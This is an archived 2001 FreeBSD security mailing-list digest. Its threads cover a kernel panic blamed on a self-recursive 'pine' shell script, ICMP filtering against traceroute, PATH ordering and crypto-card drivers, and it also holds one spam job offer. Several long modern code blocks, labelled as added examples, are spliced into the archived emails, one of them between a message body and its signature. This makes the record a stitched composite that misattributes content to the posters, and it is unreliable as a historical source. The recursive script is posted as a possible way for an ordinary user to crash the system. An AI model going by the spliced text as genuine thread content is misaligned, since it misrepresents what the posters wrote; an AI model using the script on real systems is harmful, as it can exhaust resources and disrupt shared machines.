From owner-freebsd-security Sun Jun 24 02:02:00 2001
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
Subject: RE: Kernel Panic
Date: Sun, 24 Jun 2001 02:01:34 -0700
Message-ID: <004101c0fc8c$44e12280$1401a8c0@tedm.placo.com>
In-Reply-To: <200106221156.AA442106040@stmail.pace.edu>

That would be impossible unless you had "." in your path. If you did (which is a very BAD thing) then yes, your script probably loaded itself (assuming you named it "pine"). This is why the system defaults to NOT having "." in the path.

However, if the script DID load itself, a recursive script under an ordinary user ID isn't allowed to crash the system. I'd be very interested in seeing someone who thinks differently post a script that could do this. Ordinary users have limit restrictions that stymie forkbombs and suchlike. Of course, if a setuid-to-root binary has a programming bug that allows an ordinary user to call it recursively, then all bets are off. But pine is not normally setuid to root.
But, since you are apparently so determined to NOT believe that your system has a hardware problem, in the interests of putting this issue to final rest, here is what I did on my own system (FreeBSD 4.2):

1) Logged in as an ordinary user.

2) Issued the commands

       PATH=.:$PATH
       export PATH

3) Created the script:

       #!/bin/sh
       ./pine -i
       rm -rf $HOME/dead.letter

   (note that not only did I put the current directory in my path, I forced the script to reload itself just to be as convincing as possible)

4) Then issued the command:

       pine

5) After about 16 seconds, I got this error message:

       ./pine: Cannot fork: Resource temporarily unavailable

   and the script exited and came back to the $ prompt.

And, just for the sake of argument, I ALSO did the exact same thing as the root user, and got the exact same response.

Please, you need to give the FreeBSD developers credit for SOME sense at least. You're not the only one that has ever built a recursive script by accident, you know. FreeBSD is not so fragile that this kind of thing is going to kill it.

Like I said, you need to focus your attention on your disk subsystem. The script you built, called recursively, creates an intense burst of disk activity until the system runs out of resources. It's that burst of activity that's taking your system down, not the fact that the recursive script is consuming all free resources. Undoubtedly, if you were to run other equally disk-intensive programs on your machine they would cause it to crash as well. If you don't want to believe you have a hardware problem then fine, but please don't throw unwarranted stones at the OS in place of that.
Ted Mittelstaedt                      tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com

>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Jonathan Slivko
>Sent: Friday, June 22, 2001 8:56 AM
>To: js43064n@pace.edu; freebsd-questions@FreeBSD.ORG; freebsd-stable@FreeBSD.ORG; freebsd-security@FreeBSD.ORG; Ted Mittelstaedt
>Subject: RE: Kernel Panic
>
>I think I see what caused the kernel to crash. What happened was this, I believe: since I didn't specify the regular pine binary, the script just loaded itself, thus throwing it into a loop. It's really a sad situation. -- Jonathan
>
>Jonathan M. Slivko
>Technical Support, Black Lotus Communications
>http://www.blacklotus.net -- check us out!
>
>---------- Original Message ----------------------------------
>From: "Ted Mittelstaedt"
>Date: Thu, 21 Jun 2001 23:34:02 -0700
>
>>That absolutely will not crash a FreeBSD system that's not got other problems.
>>
>>However, what I think is going on here is that the system that you ran this on has buggy disk hardware. It's probably some IDE disk, right?
>>
>>I've got a system here that I've tried 5 different IDE paddle cards in, and on every one I've tried installing FreeBSD and doing different operations, and within about 20 minutes I had crashed it and screwed up the filesystem.
>>
>>I finally got so annoyed I dug up an old AHA1520 SCSI card and slapped a 1GB SCSI disk on it (the system isn't intended to be doing anything fancy) and it's been solid as a rock ever since. The best conclusion I have is that the ISA bus in the system has some clock speed error that doesn't affect the SCSI disk system.
>>
>>Ted Mittelstaedt                      tedm@toybox.placo.com
>>Author of: The FreeBSD Corporate Networker's Guide
>>Book website: http://www.freebsd-corp-net-guide.com
>>
>>>-----Original Message-----
>>>From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Jonathan Slivko
>>>Sent: Thursday, June 21, 2001 4:59 PM
>>>To: freebsd-questions@FreeBSD.ORG; freebsd-stable@FreeBSD.ORG; freebsd-security@FreeBSD.ORG
>>>Subject: Kernel Panic
>>>
>>>Hello,
>>>
>>>I just wrote a little shell script that, on the machine I tested it on, crashed the box and forced a reboot. The contents of the script were:
>>>
>>>#!/bin/sh
>>>pine -i
>>>rm -rf $HOME/dead.letter
>>>
>>>That's the whole script. I don't see how something like that could cause a kernel to crash. Would anyone mind trying to replicate this on a test box? If it's a security issue, I'll forward it to security when I get more information.
>>>
>>>-- Jonathan
>>>
>>>Jonathan M. Slivko
>>>Technical Support, Black Lotus Communications
>>>http://www.blacklotus.net -- check us out!
>>>
>>>Sent via the Pace University Mail system at stmail.pace.edu
>>>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jun 24 03:47:25 2001
From: e-marketing@mail.ru
Reply-To: e-marketing@mail.ru
Subject: Job Offer
Date: Sat, 23 Jun 2001 23:06:04 +0400

Hello!! e-Marketing Center welcomes you.
We offer you real ways to earn money. The contents of our offer:
- Multi-Level-Marketing program for instant earnings
- The possibility of getting free Visa, American Express and Master Card cards
- Free e-Marketing Books: a technology for distribution and sales
- The best referral recruitment programs
- Subscription to a mailing list about virtual marketing: free recommendations etc.
Detailed information is on our site http://www.e-marketing.boom.ru
Regards, e-Marketing Center
===========================================================
This message was generated by the NewsMailer v1.3 news mailing program. Download: http://www.softtrade.ru/filez/emailer.zip Please go to http://www.softtrade.ru

From owner-freebsd-security Sun Jun 24 08:10:37 2001
From: Dag-Erling Smorgrav <des@ofug.org>
To: freebsd-security@FreeBSD.ORG
Subject: Re: disable traceroute to my host
Date: 24 Jun 2001 17:10:31 +0200
In-Reply-To: <20010622230217.JKT10107.mta05.onebox.com@onebox.com>

"Kris Anderson" writes:
> You can put in a rule like
>
> ipfw add 3 deny icmp from any to FF.FF.FF.FF via F0
> [...]

AUUUUGH!

First - the only one who got it right is Brooks Davis: no, it can't be done. The best you can hope for is to prevent your own box (and anything behind it, if it's a gateway) from responding to certain specific types of traces, but the tracer will still be able to see most of the route between you and him, and there are ways of tracing a route that you can't block without also blocking a lot of legitimate traffic.

Second - traceroute is pretty harmless, and not really the cornerstone of 3v1l h4ckd0m you people seem to think it is, so even if you could prevent anyone from tracerouting you it wouldn't make much (or even any) difference to an attacker's ability to harm you.
Third - if you set up ipfw to unconditionally block ICMP (whether in the mistaken belief that it will prevent route tracing or for some other lameass reason), I will personally buy a very heavy baseball bat, hop on a plane, and pay you a visit you'll remember for the rest of your very short lives. Although some ICMP types are admittedly not very useful, that doesn't mean none of them are, and you should at the very least let types 3 and 11 through or you'll be very sorry. I usually set up my filters to let 0, 3, 8 and 11 through and block everything else.

Fourth - this subject has been discussed to death on this very list several times in the past. We keep searchable archives for a reason.

Fifth - someone mentioned stealth routing. There's no such thing in FreeBSD, but there's something called stealth forwarding, which I wrote*, and which makes the TCP/IP stack neither decrement nor even inspect the TTL on forwarded packets, so if someone traceroutes a host behind you you won't show up in the trace, but if someone traceroutes you it'll be business as usual. You need to add the IPSTEALTH option to your kernel to enable support for this (and toggle a sysctl variable to actually turn stealth forwarding on).
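The ICMP policy Dag-Erling describes in his "Third" point, written out as ipfw(8) commands. This is an added example, not code from his message or from FreeBSD; the rule numbers 1000 and 1010 are assumptions (pick ones that fit your ruleset), while the `icmptypes` keyword, the IPSTEALTH kernel option and the `net.inet.ip.stealth` sysctl are FreeBSD's own. The functions only print the commands, so the script is safe to run anywhere; on a FreeBSD box with ipfw enabled, pipe the output to `sh` as root.

```sh
#!/bin/sh
# Added example, not code from the thread. Emits the ipfw(8) commands for the
# ICMP policy described above: allow echo reply (0), destination unreachable
# (3), echo request (8) and time exceeded (11); deny every other ICMP type.

# Why these four: type 3 carries "fragmentation needed" (code 4), without
# which path MTU discovery stalls and large TCP transfers hang; type 11 is
# what traceroute replies are made of, so dropping it breaks *your* traces,
# not the attacker's; 8 and 0 are ping request and reply.
ALLOWED_ICMP_TYPES="0,3,8,11"

# What not to do (the rule quoted at the top of the message, generalised):
#   ipfw add 3 deny icmp from any to any
# It drops types 3 and 11 along with everything else.

# icmp_policy_rules [BASE]
# Prints the two rules, numbered from BASE (default 1000, an assumption).
icmp_policy_rules() {
    base="${1:-1000}"
    echo "ipfw add $base allow icmp from any to any icmptypes $ALLOWED_ICMP_TYPES"
    echo "ipfw add $((base + 10)) deny icmp from any to any"
}

# icmp_allowed TYPE
# Returns 0 if ICMP type TYPE passes the policy above, 1 otherwise.
icmp_allowed() {
    case ",$ALLOWED_ICMP_TYPES," in
        *,"$1",*) return 0 ;;
        *)        return 1 ;;
    esac
}

# stealth_forwarding_notes
# The "Fifth" point: stealth forwarding is a kernel option plus a sysctl.
# It hides this host from traces that pass *through* it, not from traces
# aimed at it.
stealth_forwarding_notes() {
    echo 'kernel config: options IPSTEALTH'
    echo 'runtime:       sysctl net.inet.ip.stealth=1'
}

# Review the output, then apply as root:   icmp_policy_rules 1000 | sh
icmp_policy_rules
stealth_forwarding_notes
```

The allow rule must come before the deny rule in the ruleset (ipfw evaluates in rule-number order), which is why the deny gets the higher number.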
DES
--
Dag-Erling Smorgrav - des@ofug.org

* It went a bit like this: Friend: "Sun have this new firewall product that's really cool, it can do blah blah blah" - Me: "Oh, FreeBSD can do that" - Friend: "No, it can't" - Me: "Yes, it can" - Friend: "No it can't, because blah blah blah" - Me: "Oh, I see" "Now FreeBSD can do that too" - Friend:

From owner-freebsd-security Sun Jun 24 08:49:02 2001
From: Dag-Erling Smorgrav <des@ofug.org>
To: Soren Kristensen
Cc: hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Status of encryption hardware support in FreeBSD
Date: 24 Jun 2001 17:48:47 +0200
In-Reply-To: <3B33A891.EC712701@soekris.com>

Soren Kristensen writes:
> As I now have prototypes available of low cost PCI and MiniPCI boards, moving to production in a couple of weeks, I would like to check up on the work, as I would really like to see FreeBSD support. The boards are now supported in OpenBSD 2.9.
OK, so if I understand correctly, the encryption hardware in question offers a high-speed hardware implementation of the encryption algorithms used by IPSec, so it's a matter of a) having support code that interfaces with the hardware, possibly with a device interface to allow userland apps access to the encryption hardware and b) making our (well, KAME's) IPSec code use that instead of doing the encryption in software. Is that it, or did I misunderstand something?

Now, if you want FreeBSD support for your hardware, all you have to do is find a willing developer, send him a sample board (or preferably two, for a full circuit, but one will do) with complete documentation and any additional resources you are willing and able to provide, and then wait a bit. Simply asking for someone to port the OpenBSD driver will not do - OpenBSD and FreeBSD are not very similar at the kernel level, and as others have stated before in a different context, driver source does not constitute adequate documentation. It helps, but it's neither sufficient nor necessary.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sun Jun 24 08:57:40 2001
From: Dag-Erling Smorgrav <des@ofug.org>
To: "Ted Mittelstaedt"
Subject: Re: Kernel Panic
Date: 24 Jun 2001 17:57:26 +0200
In-Reply-To: <004101c0fc8c$44e12280$1401a8c0@tedm.placo.com>

"Ted Mittelstaedt" writes:
> That would be impossible unless you had "." in your path. If you did (which is a very BAD thing) then yes your script probably loaded itself (assuming you named it "pine"). This is why the system defaults to NOT having "." in the path.

No: 1) he simply had the script, named "pine", in a directory that was in his search path (e.g. $HOME/bin), and 2) the reason why you shouldn't have any relative path ("." included) in your search path is that you'd get unpredictable and surprising results, and potentially stumble across trojans (imagine an "ls" binary in some random user's home directory that, when you ran it, installed a setuid shell, or sent spam in your name, before giving you a carefully edited directory listing).

> However, if the script DID load itself, a recursive script under an ordinary user ID isn't allowed to crash the system.

Yes it is, unfortunately. FreeBSD doesn't like running out of swap space. Matt Dillon has been trying to correct this in -CURRENT, but it's not completely fixed yet.
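An added example in plain sh, not code from Ted's or Dag-Erling's messages, that makes both halves of the PATH argument concrete: how a script named "pine" in a directory that comes early in PATH (or an empty or "." entry) wins the lookup over the real binary, how to audit a PATH string for the entries that allow that, and how a wrapper script can find the program it is named after by searching PATH with its own directory removed, instead of finding itself. The function names, the temporary directories the demo creates, and the use of `find -perm -002` for the world-writable check are all this example's own choices.

```sh
#!/bin/sh
# Added example, not code from the thread. POSIX sh only.

# audit_path PATHSTRING
# Prints one finding per line for entries that mean the current directory
# ("" or "."), are relative, or are world-writable directories (where any
# local user could drop a "pine" or an "ls"). Returns 1 if anything was found.
audit_path() {
    rest="$1:"          # trailing ':' so the last entry is split like the others
    pos=0; rc=0
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"; rest="${rest#*:}"
        pos=$((pos + 1))
        case "$entry" in
            ""|.) echo "entry $pos: '$entry' is the current directory"; rc=1 ;;
            /*)   ;;    # absolute: fine as far as the string goes
            *)    echo "entry $pos: '$entry' is relative"; rc=1 ;;
        esac
        # -perm -002: all of the "other write" bits set, i.e. world-writable
        if [ -d "$entry" ] && [ -n "$(find "$entry" -prune -perm -002 2>/dev/null)" ]; then
            echo "entry $pos: '$entry' is world-writable"; rc=1
        fi
    done
    return $rc
}

# resolve_cmd NAME PATHSTRING
# Prints the first executable NAME along PATHSTRING, the way the shell
# resolves a bare command name. Prints nothing and returns 1 if none exists.
resolve_cmd() {
    name="$1"; rest="$2:"
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"; rest="${rest#*:}"
        [ -z "$dir" ] && dir=.          # an empty entry is the current directory
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"; return 0
        fi
    done
    return 1
}

# strip_dir DIR PATHSTRING
# Prints PATHSTRING with every entry equal to DIR removed. A wrapper that
# calls the program it is named after should resolve that program with its
# own directory stripped; then it cannot recurse into itself.
strip_dir() {
    dir="$1"; rest="$2:"; out=""; first=1
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"; rest="${rest#*:}"
        [ "$entry" = "$dir" ] && continue
        if [ "$first" = 1 ]; then out="$entry"; first=0; else out="$out:$entry"; fi
    done
    printf '%s\n' "$out"
}

# Demo with constructed directories: a wrapper "pine" in bin/ shadows the
# stand-in "real" binary in real/ until bin/ is removed from the search path.
demo() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/bin" "$tmp/real"
    printf '#!/bin/sh\nexit 0\n' > "$tmp/bin/pine";  chmod 755 "$tmp/bin/pine"
    printf '#!/bin/sh\nexit 0\n' > "$tmp/real/pine"; chmod 755 "$tmp/real/pine"
    p="$tmp/bin:$tmp/real"
    echo "bare lookup:     $(resolve_cmd pine "$p")"
    echo "own dir removed: $(resolve_cmd pine "$(strip_dir "$tmp/bin" "$p")")"
    audit_path ".:$p" || echo "(audit found risky entries)"
    rm -rf "$tmp"
}

demo
```

Note that a trailing or doubled colon in PATH is the same as "." and is easy to miss by eye; `audit_path` reports it because the splitting loop keeps empty entries. To check your own shell, run `audit_path "$PATH"` and `resolve_cmd pine "$PATH"`.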
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sun Jun 24 09:09:54 2001
From: "Karsten W. Rohrbach" <karsten@rohrbach.de>
To: Dag-Erling Smorgrav
Cc: Soren Kristensen, hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Status of encryption hardware support in FreeBSD
Date: Sun, 24 Jun 2001 18:10:07 +0200
Message-ID: <20010624181007.C52432@mail.webmonster.de>

Dag-Erling Smorgrav(des@ofug.org)@2001.06.24 17:48:47 +0000:
> Soren Kristensen writes:
> > As I now have prototypes available of low cost PCI and MiniPCI boards, moving to production in a couple of weeks, I would like to check up on the work, as I would really like to see FreeBSD
> > support. The boards are now supported in OpenBSD 2.9.
>
> OK, so if I understand correctly, the encryption hardware in question offers a high-speed hardware implementation of the encryption algorithms used by IPSec, so it's a matter of a) having support code that interfaces with the hardware, possibly with a device interface to allow userland apps access to the encryption hardware and b) making our (well, KAME's) IPSec code use that instead of doing the encryption in software. Is that it, or did I misunderstand something?

i think ipsec crypto abstraction into hardware is one side of the medal, but the other side -- to be polished first -- is getting openssl onto the iron.

for my former employer i had my hands on rainbow crypto hardware. it is a pci card called cryptoswift with a number, indicating the amount of ssl handshakes per second. the company has been renamed to ivea (http://www.ivea.com/). i came across this board since it is used in several "appliance" style boxes such as the intel netstructure ssl accelerators (drop-in https->http ethernet bridge). they had working support and drivers for 3.x, developed in-house, and i started hacking up the code for 4.x, but then i left the company (had to leave the hardware there, of course).

as far as i got, my experience with ssl handshake processing in hardware showed me a great improvement, since openssl plugs in the hardware to create random and to create session keys. stream crypto is spoken on the host, but this is done fast and very efficiently. if you offload the handshakes to the iron, most of your sysload goes away, of course.

i did not find another vendor in europe that provides a similar chip on a pci card, doing the stuff on the iron on a very high level (the card speaks x.50x ascii armored certificates natively, as far as i could see). it would be interesting if somebody from the u.s. could join in and present a list of available hardware and corresponding vendors.
if there is hardware available from a crypto-relaxed country, such as south africa or similar, this would also be _very_ interesting, IMHO.

> Now, if you want FreeBSD support for your hardware, all you have to do is find a willing developer, send him a sample board (or preferably two, for a full circuit, but one will do) with complete documentation and any additional resources you are willing and able to provide, and then wait a bit. Simply asking for someone to port the OpenBSD driver will not do - OpenBSD and FreeBSD are not very similar at the kernel level, and as others have stated before in a different context, driver source does not constitute adequate documentation. It helps, but it's neither sufficient nor necessary.

as i said, there is a 3.x freebsd driver, would this help?
i am not into writing drivers ;-)

/k
--
> Sex is one of the nine reasons for reincarnation ... the other eight are unimportant. --Henry Miller
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
Please do not remove my address from To: and Cc: fields in mailing lists.
10x

From owner-freebsd-security Sun Jun 24 09:11:40 2001
From: "Karsten W. Rohrbach" <karsten@rohrbach.de>
To: ohshutup@zdnetonebox.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPF rule response
Date: Sun, 24 Jun 2001 18:11:57 +0200
Message-ID: <20010624181157.D52432@mail.webmonster.de>
In-Reply-To: <20010622220312.PZQH9852.mta11.onebox.com@onebox.com>

Kris Anderson(ohshutup@zdnetmail.com)@2001.06.22 15:03:12 +0000:
> Howdy folks,
>
> I've got a rule in my ipf that is reporting the following to syslog
>
> : <2>Jun 22 14:51:34 /kernel: ipfw: 3 Deny TCP 195.224.212.72:21 :21 in via rl0
>
> I have limited understanding but it looks like some bonehead on the 195. network is doing some sort of goofy ftp thing to my public_if, almost as if it was ftp relaying.
>
> Could somebody unconfuse me as to what this means?

it seems that you are mixing up ipf (ipfilter) and ipfw in the first place. a properly configured ipfilter with ftp in-core proxy for keeping state on the sessions would solve it i think.

/k
--
> "In Christianity neither morality nor religion come into contact with reality at any point."
> --Friedrich Nietzsche
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
Please do not remove my address from To: and Cc: fields in mailing lists.
10x

From owner-freebsd-security Sun Jun 24 09:15:59 2001
From: "Karsten W. Rohrbach" <karsten@rohrbach.de>
To: Dag-Erling Smorgrav
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: disable traceroute to my host
Date: Sun, 24 Jun 2001 18:16:14 +0200
Message-ID: <20010624181614.E52432@mail.webmonster.de>
References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com>

Dag-Erling Smorgrav(des@ofug.org)@2001.06.24 17:10:31 +0000:
> Third - if you set up ipfw to unconditionally block ICMP (whether in the mistaken belief that it will prevent route tracing or for some other lameass reason), I will personally buy a very heavy baseball bat, hop on a plane, and pay you a visit you'll remember for the rest of your very short lives. Although some ICMP types are admittedly not very useful, that doesn't mean none of them are, and you should at the very least let types 3 and 11 through or you'll be very sorry. I usually set up my filters to let 0, 3, 8 and 11 through and block everything else.

dag, could you please write an rfc based on this? especially the part with the baseball bat sounds very nice to me -- being a netops guy for most of my life.
you care for the writing, i care for the beer ;-)

> * It went a bit like this: Friend: "Sun have this new firewall product that's really cool, it can do blah blah blah" - Me: "Oh, FreeBSD can do that" - Friend: "No, it can't" - Me: "Yes, it can" - Friend: "No it can't, because blah blah blah" - Me: "Oh, I see" "Now FreeBSD can do that too" - Friend:

hehe, reminds me of this customer's nokia ip-330 sitting in the corner of my lab -- i probably will wipe ipso and this weird-ass checkpoint fw1, replace it with freebsd and ipfilter :->

/k
--
> who | grep -i blonde | date; cd ~; unzip; touch; finger; mount;\
> gasp; yes; uptime; umount; sleep 600
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
Please do not remove my address from To: and Cc: fields in mailing lists.
10x

From owner-freebsd-security Sun Jun 24 09:20:19 2001
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
Subject: RE: Kernel Panic
Date: Sun, 24 Jun 2001 09:20:03 -0700
Message-ID: <006001c0fcc9$86301ce0$1401a8c0@tedm.placo.com>

>-----Original Message-----
>From: des@ofug.org [mailto:des@ofug.org]
>Sent: Sunday, June 24, 2001 8:57 AM
>To: Ted Mittelstaedt
>Cc: js43064n@pace.edu; freebsd-questions@FreeBSD.ORG; freebsd-stable@FreeBSD.ORG; freebsd-security@FreeBSD.ORG
>Subject: Re: Kernel Panic
>
>"Ted Mittelstaedt" writes:
>> That would be impossible unless you had "."
>> in your path. If
>> you did (which is a very BAD thing) then yes your script probably
>> loaded itself (assuming you named it "pine"). This is why the
>> system defaults to NOT having "." in the path.
>
>No: 1) he simply had the script, named "pine", in a directory that was
>in his search path (e.g. $HOME/bin),

That's a case I hadn't thought of - however, "local" search paths should generally be at the END of the user's path, not the beginning, in which case the system binary gets called first. Both cases are bad practice, and shouldn't be present on a normal system.

>
>Yes it is, unfortunately. FreeBSD doesn't like running out of swap
>space. Matt Dillon has been trying to correct this in -CURRENT, but
>it's not completely fixed yet.
>

I think in that situation you would have to have a swap partition that's smaller than the maximum amount of RAM that a normal user is permitted to allocate - in that case the limits are set too high.

Ted Mittelstaedt                      tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com

From owner-freebsd-security Sun Jun 24 9:21:02 2001
To: "Karsten W.
Rohrbach"
Cc: Soren Kristensen, hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Status of encryption hardware support in FreeBSD
References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de>
From: Dag-Erling Smorgrav
Date: 24 Jun 2001 18:20:53 +0200
In-Reply-To: <20010624181007.C52432@mail.webmonster.de>

"Karsten W. Rohrbach" writes:
> i think ipsec crypto abstraction into hardware is one side of the medal,
> but the other side -- to be polished first -- is getting openssl onto
> the iron.

What you're basically trying to say is that you want a userland interface to the crypto hardware, so that OpenSSL can take advantage of it if it's present?

> as i said, there is a 3.x freebsd driver, would this help?
> i am not into writing drivers ;-)

Allow me to repeat myself: "driver source does not constitute adequate documentation. It helps, but it's neither sufficient nor necessary." A 3.x driver *could* be ported forward to 4.x and 5.x, but the required changes are not trivial (newbus, SMPng...) and you'd still need sample boards for testing and debugging, and docs for reference when you don't understand what the existing driver is trying to do.
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sun Jun 24 9:22:50 2001
From: "Ted Mittelstaedt"
Subject: RE: Kernel Panic
Date: Sun, 24 Jun 2001 09:22:37 -0700
Message-ID: <006101c0fcc9$e1a84020$1401a8c0@tedm.placo.com>

>-----Original Message-----
>From: des@ofug.org [mailto:des@ofug.org]
>Sent: Sunday, June 24, 2001 8:57 AM
>
>
>Yes it is, unfortunately. FreeBSD doesn't like running out of swap
>space. Matt Dillon has been trying to correct this in -CURRENT, but
>it's not completely fixed yet.
>

One other thing - the recursive script the user originally posted does not appear to consume all free swap in the system. I still maintain he has a hardware error in the disk system.
Ted Mittelstaedt                      tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com

From owner-freebsd-security Sun Jun 24 9:25:17 2001
From: Dag-Erling Smorgrav
To: "Ted Mittelstaedt"
Subject: Re: Kernel Panic
Date: 24 Jun 2001 18:25:05 +0200
References: <006001c0fcc9$86301ce0$1401a8c0@tedm.placo.com>
In-Reply-To: <006001c0fcc9$86301ce0$1401a8c0@tedm.placo.com>

"Ted Mittelstaedt" writes:
> That's a case I hadn't thought of - however, "local" search paths should
> generally be at the END of the user's path, not the beginning, in which case
> the system binary gets called first.

No! Local paths should be at the beginning, so local binaries (wrappers etc.) can override system binaries.

> Both cases are bad practice, and shouldn't be present on a normal system.

Bollocks.
> I think in that situation you would have to have a swap partition that's
> smaller than the maximum amount of RAM that a normal user is permitted to
> allocate - in that case the limits are set too high.

That, or the limits simply don't account for all the resources a user can consume, as is the case with mmap().

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sun Jun 24 9:26:46 2001
From: Dag-Erling Smorgrav
To: "Ted Mittelstaedt"
Subject: Re: Kernel Panic
Date: 24 Jun 2001 18:26:33 +0200
References: <006101c0fcc9$e1a84020$1401a8c0@tedm.placo.com>
In-Reply-To: <006101c0fcc9$e1a84020$1401a8c0@tedm.placo.com>

"Ted Mittelstaedt" writes:
> One other thing - the recursive script the user originally posted does not
> appear to consume all free swap in the system. I still maintain he has a
> hardware error in the disk system.

A disk error would not crash the system. Please stop spouting unfounded (though highly imaginative) bullshit.
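The search-path case argued over above (a script named "pine" sitting in a directory on the user's PATH), as an added example that is not code from any message in this thread: it models the lookup the shell performs, runs a wrapper that calls pine by bare name once with its own directory first and once with the system directory first, and then runs the same wrapper rewritten to exec the real binary by absolute path. The directory layout, the stand-in pine, and the PINE_DEPTH guard that bounds the recursion are assumptions constructed for the example.

```python
"""Added example, not code from any message in this thread: how the shell
resolves a command named "pine" through PATH, why a script of that name that
calls "pine" by bare name re-executes itself when its own directory is
searched first, and a wrapper form that does not. Everything is built under a
temporary directory; no real pine is involved, and the naive wrapper carries a
depth guard (PINE_DEPTH, constructed here) so it stops instead of running
until the process limit is hit."""
import os
import subprocess
import tempfile

# Stand-in for the system binary: just reports that it ran.
REAL_PINE = '#!/bin/sh\necho "real-pine $*"\n'

# Naive wrapper: "pine" is looked up through PATH again, so if this directory
# is searched first it finds itself. The PINE_DEPTH guard only makes the
# recursion observable and bounded.
NAIVE_WRAPPER = (
    '#!/bin/sh\n'
    'depth=$((${PINE_DEPTH:-0} + 1))\n'
    'if [ "$depth" -gt 5 ]; then echo "wrapper re-entered $depth times, stopping"; exit 0; fi\n'
    'PINE_DEPTH=$depth pine -i "$@"\n'
)

# Hardened wrapper: exec the real binary by absolute path, so PATH order no
# longer matters. {real} is filled in with the stand-in's location.
SAFE_WRAPPER = '#!/bin/sh\nexec "{real}" -i "$@"\n'


def write_script(path, text):
    with open(path, "w") as fh:
        fh.write(text)
    os.chmod(path, 0o755)


def setup_layout(root):
    """Create <root>/sys/pine (system binary) and <root>/home/bin/pine (naive
    wrapper). Returns (sys_dir, user_bin)."""
    sys_dir = os.path.join(root, "sys")
    user_bin = os.path.join(root, "home", "bin")
    os.makedirs(sys_dir)
    os.makedirs(user_bin)
    write_script(os.path.join(sys_dir, "pine"), REAL_PINE)
    write_script(os.path.join(user_bin, "pine"), NAIVE_WRAPPER)
    return sys_dir, user_bin


def first_in_path(name, path_dirs):
    """First executable `name` along `path_dirs`, searched in order the way
    execvp(3) does, or None if absent."""
    for d in path_dirs:
        candidate = os.path.join(d, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def run_wrapper(wrapper, path_dirs):
    """Run `wrapper` with PATH set to `path_dirs` and return its stdout."""
    env = dict(os.environ, PATH=os.pathsep.join(path_dirs))
    env.pop("PINE_DEPTH", None)
    done = subprocess.run(["/bin/sh", wrapper, "x"], env=env,
                          capture_output=True, text=True, check=True)
    return done.stdout.strip()


def demo():
    """Returns (home_first_is_wrapper, system_first_is_real, naive_home_first,
    naive_system_first, safe_home_first) for the constructed layout."""
    with tempfile.TemporaryDirectory() as root:
        sys_dir, user_bin = setup_layout(root)
        wrapper = os.path.join(user_bin, "pine")
        real = os.path.join(sys_dir, "pine")
        home_first = first_in_path("pine", [user_bin, sys_dir]) == wrapper
        system_first = first_in_path("pine", [sys_dir, user_bin]) == real
        naive_home = run_wrapper(wrapper, [user_bin, sys_dir])   # re-enters itself
        naive_sys = run_wrapper(wrapper, [sys_dir, user_bin])    # reaches the real binary
        write_script(wrapper, SAFE_WRAPPER.format(real=real))
        safe_home = run_wrapper(wrapper, [user_bin, sys_dir])    # absolute path wins
    return home_first, system_first, naive_home, naive_sys, safe_home


if __name__ == "__main__":
    labels = ("home/bin first resolves to wrapper", "sys first resolves to real pine",
              "naive wrapper, home/bin first", "naive wrapper, sys first",
              "safe wrapper, home/bin first")
    for label, value in zip(labels, demo()):
        print("%-36s %s" % (label, value))
```

Run it with no arguments to print the five results. The point the two runs of the naive wrapper make is that nothing in the script itself changed; only the PATH order decided whether "pine" meant the wrapper or the system binary, which is why the hardened form names the target by absolute path instead of relying on that order.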
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sun Jun 24 9:31:44 2001
Date: Sun, 24 Jun 2001 18:31:47 +0200
From: "Karsten W. Rohrbach"
To: Dag-Erling Smorgrav
Cc: Soren Kristensen, hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
